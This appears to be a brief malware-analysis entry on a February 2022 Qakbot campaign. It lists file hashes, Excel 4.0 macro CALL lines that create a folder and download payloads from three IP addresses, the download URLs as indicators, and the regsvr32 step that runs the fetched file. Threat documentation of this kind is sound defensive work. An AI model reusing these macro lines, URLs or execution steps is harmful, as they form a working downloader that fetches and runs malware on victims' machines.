24.02.2022 | Qakbot | ?? | 

.xls 1c7829f0316c7aeb94e0887bedf93e3667ab1283659bb1e3d5bcb2860d609ec1
.dll 283fed02e9434975e43435a8748ab01451199a061da32e94e39128fd7745db24


=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\a", 0)
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "http://185.81.113.214/44616.6382774305.dat", "C:\a\Gertiokas1.ocx")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "http://67.43.234.56/44616.6382774305.dat", "C:\a\Gertiokas2.ocx")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "http://23.106.124.9/44616.6382774305.dat", "C:\a\Gertiokas3.ocx")

http://185.81.113.214/44616.6382774305.dat
http://67.43.234.56/44616.6382774305.dat
http://23.106.124.9/44616.6382774305.dat

Exec >>

EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\1c7829f0316c7aeb94e0887bedf93e3667ab1283659bb1e3d5bcb2860d609ec1.xlsb

regsvr32  C:\a\Gertiokas1.ocx

*************************************************

